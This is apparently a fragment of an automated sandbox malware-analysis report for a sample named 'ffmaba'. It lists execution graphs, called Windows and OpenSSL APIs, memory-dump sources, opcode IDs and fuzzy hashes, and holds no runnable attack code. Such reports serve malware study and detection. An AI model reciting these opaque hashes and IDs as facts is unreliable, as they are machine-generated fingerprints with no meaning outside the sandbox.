                                                                            • Instruction Fuzzy Hash: 97F1C374E01219CFDB14DFA9D984B9DFBB2BF89300F2491AAD809AB355DB349981CF40
                                                                            Function 09676F56 Relevance: .1, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2de3a77779b527198f19d74f12440ecbfc162c492536e6e7ac46b24fe53c49dc
                                                                            • Instruction ID: d697857207892c175d29f75ca3294629b3cee3f31151b97902e7156faa35e53c
                                                                            • Opcode Fuzzy Hash: 2de3a77779b527198f19d74f12440ecbfc162c492536e6e7ac46b24fe53c49dc
                                                                            • Instruction Fuzzy Hash: F441C075D01229DFCB65DF64D888AD9BBB2FF59301F1091EAE109A7261DB31AE81CF40

                                                                            Execution Graph

                                                                            Execution Coverage:7.2%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:42
                                                                            Total number of Limit Nodes:6
                                                                            execution_graph 14261 290b3b0 14262 290b3bf 14261->14262 14264 290b499 14261->14264 14265 290b4b9 14264->14265 14266 290b4dc 14264->14266 14265->14266 14272 290b740 14265->14272 14276 290b731 14265->14276 14266->14262 14267 290b4d4 14267->14266 14268 290b6e0 GetModuleHandleW 14267->14268 14269 290b70d 14268->14269 14269->14262 14273 290b754 14272->14273 14275 290b779 14273->14275 14280 290aeb0 14273->14280 14275->14267 14277 290b754 14276->14277 14278 290aeb0 LoadLibraryExW 14277->14278 14279 290b779 14277->14279 14278->14279 14279->14267 14281 290b920 LoadLibraryExW 14280->14281 14283 290b999 14281->14283 14283->14275 14284 290d740 14285 290d786 GetCurrentProcess 14284->14285 14287 290d7d1 14285->14287 14288 290d7d8 GetCurrentThread 14285->14288 14287->14288 14289 290d815 GetCurrentProcess 14288->14289 14290 290d80e 14288->14290 14291 290d84b GetCurrentThreadId 14289->14291 14290->14289 14293 290d8a4 14291->14293 14294 290d988 DuplicateHandle 14295 290da1e 14294->14295 14296 2904668 14297 2904672 14296->14297 14299 2904759 14296->14299 14300 290477d 14299->14300 14304 2904858 14300->14304 14308 2904868 14300->14308 14306 290488f 14304->14306 14305 290496c 14305->14305 14306->14305 14312 29044b4 14306->14312 14310 290488f 14308->14310 14309 290496c 14309->14309 14310->14309 14311 29044b4 CreateActCtxA 14310->14311 14311->14309 14313 29058f8 CreateActCtxA 14312->14313 14315 29059bb 14313->14315

                                                                            Executed Functions

                                                                            Function 0290D740 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 295 290d740-290d7cf GetCurrentProcess 299 290d7d1-290d7d7 295->299 300 290d7d8-290d80c GetCurrentThread 295->300 299->300 301 290d815-290d849 GetCurrentProcess 300->301 302 290d80e-290d814 300->302 303 290d852-290d86a 301->303 304 290d84b-290d851 301->304 302->301 308 290d873-290d8a2 GetCurrentThreadId 303->308 304->303 309 290d8a4-290d8aa 308->309 310 290d8ab-290d90d 308->310 309->310
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0290D7BE
                                                                            • GetCurrentThread.KERNEL32 ref: 0290D7FB
                                                                            • GetCurrentProcess.KERNEL32 ref: 0290D838
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0290D891
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: b55c33141a2a365b5c9851e8c5f60cde5d0951378dd1d393f51ad32e97092cb4
                                                                            • Instruction ID: 5574585171ff79cd36b658ce41f374ce1cfd52af16a27d70cf7be793da66410a
                                                                            • Opcode Fuzzy Hash: b55c33141a2a365b5c9851e8c5f60cde5d0951378dd1d393f51ad32e97092cb4
                                                                            • Instruction Fuzzy Hash: 945135B19003098FDB14DFA9DA88BAEBBF5FF88314F24845DE409A72A0D7356944CF65
                                                                            Function 0290B499 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 338 290b499-290b4b7 339 290b4e3-290b4e7 338->339 340 290b4b9-290b4c6 call 290ae4c 338->340 341 290b4e9-290b4f3 339->341 342 290b4fb-290b53c 339->342 347 290b4c8 340->347 348 290b4dc 340->348 341->342 349 290b549-290b557 342->349 350 290b53e-290b546 342->350 393 290b4ce call 290b740 347->393 394 290b4ce call 290b731 347->394 348->339 351 290b559-290b55e 349->351 352 290b57b-290b57d 349->352 350->349 355 290b560-290b567 call 290ae58 351->355 356 290b569 351->356 354 290b580-290b587 352->354 353 290b4d4-290b4d6 353->348 357 290b618-290b6d8 353->357 358 290b594-290b59b 354->358 359 290b589-290b591 354->359 361 290b56b-290b579 355->361 356->361 388 290b6e0-290b70b GetModuleHandleW 357->388 389 290b6da-290b6dd 357->389 362 290b5a8-290b5b1 call 290ae68 358->362 363 290b59d-290b5a5 358->363 359->358 361->354 369 290b5b3-290b5bb 362->369 370 290b5be-290b5c3 362->370 363->362 369->370 371 290b5e1-290b5ee 370->371 372 290b5c5-290b5cc 370->372 378 290b5f0-290b60e 371->378 379 290b611-290b617 371->379 372->371 374 290b5ce-290b5de call 290ae78 call 290ae88 372->374 374->371 378->379 390 290b714-290b728 388->390 391 290b70d-290b713 388->391 389->388 391->390 393->353 394->353
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0290B6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: f4ef6fcfa071d05fa15dbec55b4d5a54feedd99156f16c93e37d91588ce63c11
                                                                            • Instruction ID: 5028f1a9ba3dd8ddc613a69ac6c0bacbf7eb909f1f8045f906985110bb7339f2
                                                                            • Opcode Fuzzy Hash: f4ef6fcfa071d05fa15dbec55b4d5a54feedd99156f16c93e37d91588ce63c11
                                                                            • Instruction Fuzzy Hash: 938148B0A00B098FD724CF29D49579ABBF5FF88308F04896ED48AD7A90D735E945CB90
                                                                            Function 029058EC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 395 29058ec-29059b9 CreateActCtxA 397 29059c2-2905a1c 395->397 398 29059bb-29059c1 395->398 405 2905a2b-2905a2f 397->405 406 2905a1e-2905a21 397->406 398->397 407 2905a40 405->407 408 2905a31-2905a3d 405->408 406->405 410 2905a41 407->410 408->407 410->410
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 029059A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: e3e9005438db498faf1696b0f0b4b1976dd6cce0d8ef8bed02ea89f669785295
                                                                            • Instruction ID: 868950f807ed50cf1830eb1b355e6248ed8c8ce2d481b0218d7f5c335874679a
                                                                            • Opcode Fuzzy Hash: e3e9005438db498faf1696b0f0b4b1976dd6cce0d8ef8bed02ea89f669785295
                                                                            • Instruction Fuzzy Hash: 7141E2B0C0071DCFDB24CFA9C884A9DBBF6BF89304F20805AD409AB255DB756949CF50
                                                                            Function 029044B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 411 29044b4-29059b9 CreateActCtxA 414 29059c2-2905a1c 411->414 415 29059bb-29059c1 411->415 422 2905a2b-2905a2f 414->422 423 2905a1e-2905a21 414->423 415->414 424 2905a40 422->424 425 2905a31-2905a3d 422->425 423->422 427 2905a41 424->427 425->424 427->427
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 029059A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 981c647e8ecc5d1f3b1d50a26bbc6593a9435406fe11ec4d6688bf9ec432452e
                                                                            • Instruction ID: fcfabcbd1c597aed5b045ad6ed8acebccc78577ffe2307d5f505ce89d4efd19c
                                                                            • Opcode Fuzzy Hash: 981c647e8ecc5d1f3b1d50a26bbc6593a9435406fe11ec4d6688bf9ec432452e
                                                                            • Instruction Fuzzy Hash: 1B41D2B0C0071DCFDB24DFA9C884A9EBBF6BF48304F60805AD409AB295DB756949CF90
                                                                            Function 0290D988 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 428 290d988-290da1c DuplicateHandle 429 290da25-290da42 428->429 430 290da1e-290da24 428->430 430->429
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0290DA0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 1447011f925a52a731ab6b67206727eb2e91336e2a1443e1b30f528dc2f4f703
                                                                            • Instruction ID: ed1875465f9ef9a6d1ad2a98dff6f9d42354bc4f0f22f82b33d84692cad92a31
                                                                            • Opcode Fuzzy Hash: 1447011f925a52a731ab6b67206727eb2e91336e2a1443e1b30f528dc2f4f703
                                                                            • Instruction Fuzzy Hash: 5A21E4B59002089FDB10CF9AD984ADEBBF9FB48310F14841AE914A3350D374A950CF61
                                                                            Function 0290B919 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 433 290b919-290b960 434 290b962-290b965 433->434 435 290b968-290b997 LoadLibraryExW 433->435 434->435 436 290b9a0-290b9bd 435->436 437 290b999-290b99f 435->437 437->436
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0290B779,00000800,00000000,00000000), ref: 0290B98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 9df3c0563975536810c67eab93a877cff8837aeddc3e2ba26d7dd13f1cfda65a
                                                                            • Instruction ID: 7ce0d1acbf31487e106ce65e6a1ab2006bf22f5f34d17ac7fa31e81d81e60319
                                                                            • Opcode Fuzzy Hash: 9df3c0563975536810c67eab93a877cff8837aeddc3e2ba26d7dd13f1cfda65a
                                                                            • Instruction Fuzzy Hash: EE2144B6C002498FCB10CFAAC484AEEFBF4EB88314F14845AD469A7240C375A505CFA5
                                                                            Function 0290AEB0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 440 290aeb0-290b960 442 290b962-290b965 440->442 443 290b968-290b997 LoadLibraryExW 440->443 442->443 444 290b9a0-290b9bd 443->444 445 290b999-290b99f 443->445 445->444
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0290B779,00000800,00000000,00000000), ref: 0290B98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: a29e59de5682f82c47531a59bea90425314e33ee004be6f06674192b3498ab93
                                                                            • Instruction ID: 41e9392b07a40563773a5cc994ac53e12326b2e6900f3bf39b24d9cf44e74d6b
                                                                            • Opcode Fuzzy Hash: a29e59de5682f82c47531a59bea90425314e33ee004be6f06674192b3498ab93
                                                                            • Instruction Fuzzy Hash: 771114B6D003099FCB10CF9AC484A9EFBF9EB48314F14842AD529A7240C375A944CFA5
                                                                            Function 0290B698 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 448 290b698-290b6d8 449 290b6e0-290b70b GetModuleHandleW 448->449 450 290b6da-290b6dd 448->450 451 290b714-290b728 449->451 452 290b70d-290b713 449->452 450->449 452->451
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0290B6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 6c246c10264890d67e130f6b265dc51195110e8f484dd5a7b4867d02609b2040
                                                                            • Instruction ID: f94348436a4977dd6cf051d4afb7cdf6e16aad65557799d25874971ad49954eb
                                                                            • Opcode Fuzzy Hash: 6c246c10264890d67e130f6b265dc51195110e8f484dd5a7b4867d02609b2040
                                                                            • Instruction Fuzzy Hash: 0411E0B6C00349CFCB10CF9AC984ADEFBF9EB88324F14845AD429A7650C379A545CFA1
                                                                            Function 00FCD3D8 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318686088.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fcd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca3754a468c314b3302e6207018fbebff9e3ab15ca5eeb81cf8a8cd6289f4585
                                                                            • Instruction ID: 270f67eedab1cec0018c1161af5f379ada8ce226d29cc64aa9c6604a0d71c1f3
                                                                            • Opcode Fuzzy Hash: ca3754a468c314b3302e6207018fbebff9e3ab15ca5eeb81cf8a8cd6289f4585
                                                                            • Instruction Fuzzy Hash: AD2148B2504201DFCB09DF04CAC1F2ABF65FB98324F20C57CDA090B246C336E806E6A2
                                                                            Function 00FDD01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318787984.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fdd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 62679354c20699c90baf08f0b716c1eff7cde7eb24e9a5c1939d36d729533e22
                                                                            • Instruction ID: a68bf609fb7838219716bbfef791e777003d1984e2bb7a90b9ac026481b66b9a
                                                                            • Opcode Fuzzy Hash: 62679354c20699c90baf08f0b716c1eff7cde7eb24e9a5c1939d36d729533e22
                                                                            • Instruction Fuzzy Hash: 3821F575504200DFCB15DF14D988B16BB66EBC8324F28C56ED80A4B34AC33BD807DA61
                                                                            Function 00FDD1D4 Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318787984.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fdd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 27ecb8bd98d97445c403fa4edef4f4336a50573905aeb163e3820c060ea940eb
                                                                            • Instruction ID: 74d015b80852910283cc8a2b7c7463d9e78acf3a7ef1acc4f855d095e1485f49
                                                                            • Opcode Fuzzy Hash: 27ecb8bd98d97445c403fa4edef4f4336a50573905aeb163e3820c060ea940eb
                                                                            • Instruction Fuzzy Hash: 9B212971904204EFDB05DF54D9C0B26BB66FB84324F28C56ED8094B356C336D806DA61
                                                                            Function 00FDD005 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318787984.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fdd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 97004345f20d8696bd2e4658834f7145fd3d469902f50e4442c1f086f9601c89
                                                                            • Instruction ID: c64ae5a54ad1dd098a1ad55de7e44ddbec0e3239678c03f3cbfc60d09e33186c
                                                                            • Opcode Fuzzy Hash: 97004345f20d8696bd2e4658834f7145fd3d469902f50e4442c1f086f9601c89
                                                                            • Instruction Fuzzy Hash: 5D2183755093808FC712CF24D594715BF71EB46314F28C5EBD8498B6A7C33A980ACB62
                                                                            Function 00FCD3D3 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318686088.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fcd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: 9d1e4aad458fbd1a49d0f8d522bf1d399fcbd233a89a5d98e3dd6642cdbfce8f
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: 7A110376804241DFCB06CF00DAC4B1ABF71FB94324F24C2ADD9090B256C33AE85ADBA1
                                                                            Function 00FDD1CF Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318787984.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fdd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction ID: 61b08c0f1cfa09ed366cb302552d5fda436d44e4ff9a42ad001d00c1e2e81375
                                                                            • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction Fuzzy Hash: 7911BB75904280DFCB06CF10C9C4B15BBB2FB84324F28C6AED8494B796C33AD80ADB61
                                                                            Function 00FCD759 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318686088.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fcd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a18ecd0e07d75ce9850a13805e43f582dc26c7ec4910cace412b0baf57f0fa08
                                                                            • Instruction ID: 7ff578db3e6571c6c67b6827401990f2a3f4a40ff87af5c4236354966c967cd1
                                                                            • Opcode Fuzzy Hash: a18ecd0e07d75ce9850a13805e43f582dc26c7ec4910cace412b0baf57f0fa08
                                                                            • Instruction Fuzzy Hash: 28012B724053419AE7118B19CEC5F2AFFD8DF51330F18C82EEC090A286C3399840E671
                                                                            Function 00FCD758 Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318686088.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fcd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a5b4249ea1270c74a141fbf5c66dd5427a761682535efc6f05b7d8df4bc80b12
                                                                            • Instruction ID: a4d2eb92b2c63acd5ef0345c386bf251b586cb3da68e5c2eae5c7564f9317bfc
                                                                            • Opcode Fuzzy Hash: a5b4249ea1270c74a141fbf5c66dd5427a761682535efc6f05b7d8df4bc80b12
                                                                            • Instruction Fuzzy Hash: 57F0C272405340AEE7208A0ACE84B66FFA8EF51734F18C45EED084A286C3799840DAB0

                                                                            Execution Graph

                                                                            Execution Coverage:0.2%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:43.4%
                                                                            Total number of Nodes:129
                                                                            Total number of Limit Nodes:21
                                                                            execution_graph 108501 6c09a61c 108502 6c09a620 108501->108502 108503 6c09a628 CRYPTO_malloc 108502->108503 108504 6c09a670 108503->108504 108505 6c09a656 108503->108505 108508 6c0ca0c0 ERR_put_error 108504->108508 108507 6c09a612 108508->108507 108509 6c181220 108510 6c1812a0 108509->108510 108511 6c181237 108509->108511 108515 6c3440b0 108510->108515 108513 6c3440b0 5 API calls 108511->108513 108514 6c181245 108511->108514 108513->108514 108519 6c3440d0 108515->108519 108524 6c3440c5 108515->108524 108516 6c344308 108517 6c344322 EnterCriticalSection 108516->108517 108518 6c344385 LeaveCriticalSection 108517->108518 108521 6c344351 108517->108521 108518->108514 108519->108516 108523 6c34422d 108519->108523 108519->108524 108520 6c344360 TlsGetValue GetLastError 108520->108521 108521->108518 108521->108520 108522 6c344262 VirtualProtect 108522->108523 108523->108522 108523->108524 108524->108514 108525 6c29d3e0 108526 6c29d41b 108525->108526 108528 6c29d439 108525->108528 108527 6c29d4e8 CRYPTO_realloc 108526->108527 108526->108528 108529 6c29d4bd 108527->108529 108530 6c29d517 memset 108527->108530 108528->108529 108531 6c29d560 CRYPTO_malloc 108528->108531 108532 6c29d4d9 108529->108532 108533 6c29d5b1 __stack_chk_fail 108529->108533 108530->108531 108531->108529 108534 6c29d5ec 108533->108534 108535 6c29d5f6 CRYPTO_free 108534->108535 108540 6c29d62a 108534->108540 108536 6c29d648 108535->108536 108535->108540 108539 6c29d6c0 CRYPTO_realloc 108536->108539 108536->108540 108537 6c29d63a 108538 6c29d724 __stack_chk_fail 108539->108540 108540->108537 108540->108538 108540->108540 108541 6c09aac0 CRYPTO_free 108542 6c09aa50 108543 6c09aaa1 108542->108543 108544 6c09aa64 108542->108544 108545 6c09aa78 CRYPTO_free 108544->108545 108545->108543 108545->108545 108546 6c29f1d0 108549 6c29f1e5 108546->108549 108547 6c29f1e9 108551 6c29f223 memset 108547->108551 108552 6c29f237 108547->108552 108548 6c29f250 108549->108547 108549->108548 108550 6c29f215 malloc 108549->108550 108550->108547 108551->108552 108553 6c0913b0 108556 6c091220 108553->108556 108557 6c0912a0 108556->108557 108558 6c091237 108556->108558 108574 6c0eb890 108557->108574 108560 6c091288 108558->108560 108561 6c091240 108558->108561 108563 6c0eb890 12 API calls 108561->108563 108567 6c091245 108563->108567 108564 6c0912bc 108590 6c091020 9 API calls 108564->108590 108566 6c091360 108566->108560 108573 6c0912f3 108566->108573 108589 6c091020 9 API calls 108567->108589 108568 6c0912c1 108568->108560 108568->108566 108572 6c091281 108568->108572 108591 6c0eb550 _lock _unlock realloc calloc _unlock 108568->108591 108572->108560 108573->108560 108592 6c091020 9 API calls 108573->108592 108576 6c0912a5 108574->108576 108577 6c0eb8b0 108574->108577 108575 6c0ebaa0 108575->108576 108578 6c0ebab1 108575->108578 108576->108564 108576->108566 108577->108575 108577->108576 108579 6c0ebaf2 108577->108579 108583 6c0eb940 108577->108583 108587 6c0eba10 108577->108587 108585 6c0eba0d 108578->108585 108594 6c0eb730 11 API calls 108578->108594 108595 6c0eb6d0 11 API calls 108579->108595 108582 6c0ebb02 108583->108577 108584 6c0eb730 11 API calls 108583->108584 108583->108585 108593 6c0eb6d0 11 API calls 108583->108593 108584->108583 108585->108587 108587->108576 108588 6c0eba42 VirtualProtect 108587->108588 108588->108587 108589->108572 108590->108568 108591->108573 108592->108572 108593->108577 108594->108578 108595->108582 108596 6c1b32d0 108597 6c1b32f6 108596->108597 108599 6c1b32de 108596->108599 108598 6c1b3359 CRYPTO_free_ex_data CRYPTO_THREAD_lock_free CRYPTO_free 108599->108597 108599->108598 108600 6c1ba1d0 108611 6c2ac7d0 strlen MultiByteToWideChar 108600->108611 108602 6c1ba1eb strchr 108603 6c1ba258 GetLastError ERR_put_error ERR_add_error_data _errno 108602->108603 108604 6c1ba20c BIO_new 108602->108604 108607 6c1ba2bf _errno 108603->108607 108608 6c1ba2c6 ERR_put_error 108603->108608 108605 6c1ba222 BIO_clear_flags BIO_ctrl 108604->108605 108606 6c1ba300 fclose 108604->108606 108609 6c1ba24a 108605->108609 108606->108609 108607->108608 108610 6c1ba310 ERR_put_error 108607->108610 108608->108609 108610->108609 108612 6c2ac838 108611->108612 108613 6c2ac910 108611->108613 108614 6c2ac847 MultiByteToWideChar 108612->108614 108615 6c2ac950 MultiByteToWideChar 108613->108615 108619 6c2ac925 108613->108619 108616 6c2ac890 strlen MultiByteToWideChar 108614->108616 108617 6c2ac877 108614->108617 108615->108617 108615->108619 108616->108617 108618 6c2ac8d0 _wfopen 108616->108618 108620 6c2ac888 108617->108620 108621 6c2ac98c __stack_chk_fail 108617->108621 108618->108617 108622 6c2ac8e4 _errno 108618->108622 108619->108617 108623 6c2ac937 fopen 108619->108623 108620->108602 108621->108602 108624 6c2ac8fc fopen 108622->108624 108625 6c2ac8f1 _errno 108622->108625 108623->108617 108624->108617 108625->108617 108625->108624 108626 6c1dc0a0 108627 6c1dc0ac 108626->108627 108628 6c1dc0f0 108626->108628 108629 6c1dc0d8 CRYPTO_free 108627->108629 108630 6c1dc0bc CRYPTO_secure_clear_free 108627->108630 108631 6c1dc0f8 CRYPTO_clear_free free 108627->108631 108629->108628 108630->108629 108632 6c1dc120 108633 6c1dc139 108632->108633 108634 6c1dc217 108632->108634 108635 6c1dc228 108633->108635 108636 6c1dc142 108633->108636 108635->108634 108637 6c1dc22f memset 108635->108637 108639 6c1dc1d0 CRYPTO_realloc 108636->108639 108641 6c1dc169 108636->108641 108643 6c1dc250 ERR_put_error 108636->108643 108637->108634 108640 6c1dc1f1 108639->108640 108642 6c1dc1f5 memset 108640->108642 108640->108643 108641->108640 108641->108643 108644 6c1dc192 memcpy CRYPTO_secure_clear_free 108641->108644 108642->108634 108644->108642

                                                                            Executed Functions

                                                                            Function 6C1DC120 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 98COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memcpy.MSVCRT ref: 6C1DC19F
                                                                            • CRYPTO_secure_clear_free.LIBCRYPTO-1_1 ref: 6C1DC1C0
                                                                              • Part of subcall function 6C29F530: OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C29F551
                                                                            • CRYPTO_realloc.LIBCRYPTO-1_1 ref: 6C1DC1EA
                                                                            • memset.MSVCRT ref: 6C1DC212
                                                                            • memset.MSVCRT ref: 6C1DC244
